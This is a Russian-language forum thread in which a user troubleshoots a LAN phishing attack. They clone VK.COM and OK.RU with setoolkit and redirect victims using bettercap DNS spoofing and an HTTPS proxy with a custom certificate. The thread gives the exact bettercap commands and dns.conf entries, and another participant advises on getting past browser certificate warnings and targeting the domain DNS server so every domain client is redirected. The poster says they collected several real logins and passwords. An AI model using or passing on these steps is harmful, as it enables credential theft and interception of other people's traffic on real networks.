Решено bettercap + setoolkit + dns spoofing что я делаю не так?

[torquemada163]

Всем привет!

Весь день бьюсь сегодня с экспериментом в плане фишинга.... Один раз получилось, потом уже ни разу!

Итак, запустил setoolkit и создал копию сайта VK.COM. Апач запущен, сайт крутится на моем компе (атакующий):
Картинки загружаем на форум https://codeby.net/forums/faq-dlja-novichkov.115/
WebWare Team

Дальше я запускаю такую команду:

sudo bettercap --dns dns.conf -T 192.168.3.11-174

Вот содержимое файла dns.conf:

#
192.168.3.211 .*vk\.com

В итоге, только ОДИН раз у меня эта штуковина отработала нормально! Ну как нормально..... Почему-то всем пользователям писало, что невозможно установить защищенное соединение, такое бывает при разном времени. Но время у меня везде одинаково. Как следствие, после того, как клиенты вводили свои логины, их не перекидывало на настоящий VK. Но я в файлике harvest получил несколько логинов/паролей.
Но, повторюсь, это было ОДИН раз. Все последующие - вроде бы все запускается, но когда я подхожу к какому-нибудь компу в локалке и пробую ввести лоигн/пароль, то мне просто говорит, что либо неправильный логин/пароль, либо тупо входит на страницу VK и все. В файле ничего не добавляется. Если я с клиента зайду на свой адрес 192.168.3.211 и попытаюсь ввести там логин, то все нормально падает в файлик и выдает предупреждение по времени.

Такое ощущение, что не работает DNS-спуффинг и клиентов не перекидывает на мой фишинговый сайтик....

Что я делаю не так?
Заранее спасибо!

 

[kot-gor]

В вашем случае может зависеть от браузеров жертвы.,если рассматривать хром , человек если заходил на определенный сайт и вы потом пытаетесь подсунуть ему копию от set, то у вас ничего не получиться.будет писать сообщения," что невозможно соединиться".. c mail.ru именно так происходит, если же зайти с другого браузера то все работает.Начал выяснять в чем дело, оказалось что хром вшивает сертификаты популярных ресурсов в свою базу..Самая большая проблема потом, это то, что сайт потом вообще не грузиться, даже когда вы не производите атаку, так как вы поменяли днс кэш..(выход конечно есть из этого)Попробуйте это провернуть когда в качестве жерты телефон и вы заходите на сайт с хрома. Да кстати иногда глючит сам bettercap.

 

[torquemada163]

Да, действительно, у некоторых людей потом сайт VK не грузился напрочь, пока я не перегрузил DNS-сервер и собственно комп жертвы.

Но! Один раз-то все прошло нормально! И я получил не один и не два пароля.....

Я тут сам думал на эту тему и пришел к выводу, что еще дело в домене, вернее, в доменном DNS.
Ведь, в случае доменной организации сети, DNS-запросы от клиентов обслуживает не роутер, который их просто форвардит, а контроллер домена с поднятым на нем DNS-сервером. В моем случае в диапазон

-T 192.168.3.11-174

контроллер домена с поднятым там DNS не попал, он имеет адрес 192.168.3.201
Таким образом, все запросы от клиента обрабатывались без изменений.
Просто я не помню точно, но есть подозрение, что когда у меня получилось единственный раз, в этот момент я запустил без указания диапазона целей.....

Как думаете?

 

[kot-gor]

Мне сложно рассматривать ваш случай, так как днс сервер у меня внешний.что бы что то дельное вам подсказать,нужно поднимать днс сервер внутри сети и тестить.Когда вы запускаете bettercap без указания диапазона целей, он спуфит весь сегмент сети, но как работают два днс сервера в одной сети я затрудняюсь сказать. В моем случае исправлял я отравленный днс кэш подключаясь к другой сети, хотя предполагаю что можно просто подсунуть правильный днс конфиг после отравления, и все вернется на круги свои..пока не пробовал.

 

[torquemada163]

Ой! Что-то я забыл про эту ветку )))))
В общем, рапортую - в домене все одновременно сложнее и проще. В качестве цели в доменной структуре надо указывать только лишь доменные DNS-сервер(а) и ничего больше. ВСЕ клиенты домена пойдут стройными рядами по фишинговому адресу. Это не всегда удобно для точечной атаки.
Ну и прекращение этой атаки тоже не лучше - надо в доменном DNS-сервере перезапустить службу DNS и очистить кэш записей.

 

[kot-gor]

выложили бы для народа мануал, в картинках..))многим думаю был бы интересен ваш опыт..

 

[torquemada163]

Да что-то я сейчас вернулся к этой теме, а ерунда какая-то получается.... Когда bettercap перебрасывает меня на мой фишинговый комп, то у жертвы в браузере появляется вопль об ошибке сертификата. Хотя сертификат в винду втянут и если просто войти по https на веб-сервер атакующего компа, то никаких ошибок....
Почему так?

 

[kot-gor]

можете скинуть лог?

 

[torquemada163]

Вот видно ошибочную страницу и видно, что, кроме первого пункта в сведениях, остальные вполне нормальные:

А здесь видно, что сертификат атакующего компа валидный:

Так, логи чего прислать? SETOOLKIT? А где они находятся?

 

[kot-gor]

какой строкой вы запускали bettercap?

 

[kot-gor]

если вы пользуетесь хром или фаерфокс(один из них), то насколько помню, там вшиты сертификаты популярных ресурсов..и в режиме http не получится перенаправить на поддельный сайт.Насколько я понял вы не только перенаправляете на фишинговый сайт, но и еще сгенерировали свой сертификат и подсунули жертве? Вам тогда просто нужно включить bettercap в режиме прокси с поддержкой своего сгенерированного сертификата, зачем городить такой огород..)

Хотел сбросить ссылку на опыт человека в этом форуме..с генерацией и подсовыванием своего сертификата..когда нашел , оказалась ваша статья..)

Если вы делали клон на set, то попробуйте удалить все ссылки с https, в самом клоне.(меняете все слова https на http.)

 

[torquemada163]

сначала попробовал

bettercap --dns dns.conf -T 192.168.3.201,192.168.3.210

это адреса, соответственно, доменного DNS и моей тестовой жертвы
Почему-то при переходе в браузере напрочь игнорировался мой фишинговый сайт. Хотя раньше, когда я пробовал, такой номер проходил....
После этого я добавил в команду https-прокси с моим сертификатом:

bettercap --dns -dns.conf -T 192.168.3.201,192.168.3.210 --proxy-https --proxy-pem pentest_full.pem

Так у меня при попытке перехода жертвы на клон (в данном случае OK.RU), ее выбрасывает на..... Youtube, на ролик Rick Astley - Never Gonna Give You Up
Вообще чудеса какие-то!

 

[kot-gor]

у вас случайно не запущен beef ? или кроме вас кто то балуется пентестом, в вашей сети ..)

 

[torquemada163]

ps axu | grep beef

не выдает ничего. в сети точно никто не балуется - некому ))))

 

[kot-gor]

вы посмотрите в роутере ,изменен ли ваш днс по умолчанию?Мне известен только один инструмент , и это Beef, где этот ролик вшит...

 

[torquemada163]

По пингу на жертве видно, что адрес резольвется на фишинговый:

 

[kot-gor]

зайдите в сам роутер, посмотрите какой днс прописан.Возможно кто то вам подменил в настройках его.

 

[torquemada163]

У меня роутер хитрый через край, это Mikrotik, так просто так не заменишь ))))
Все нормально - стоят два провайдерских DNS:

 

[kot-gor]

нужно смотреть как получается редикт на ролик..очень похоже на атаку xss.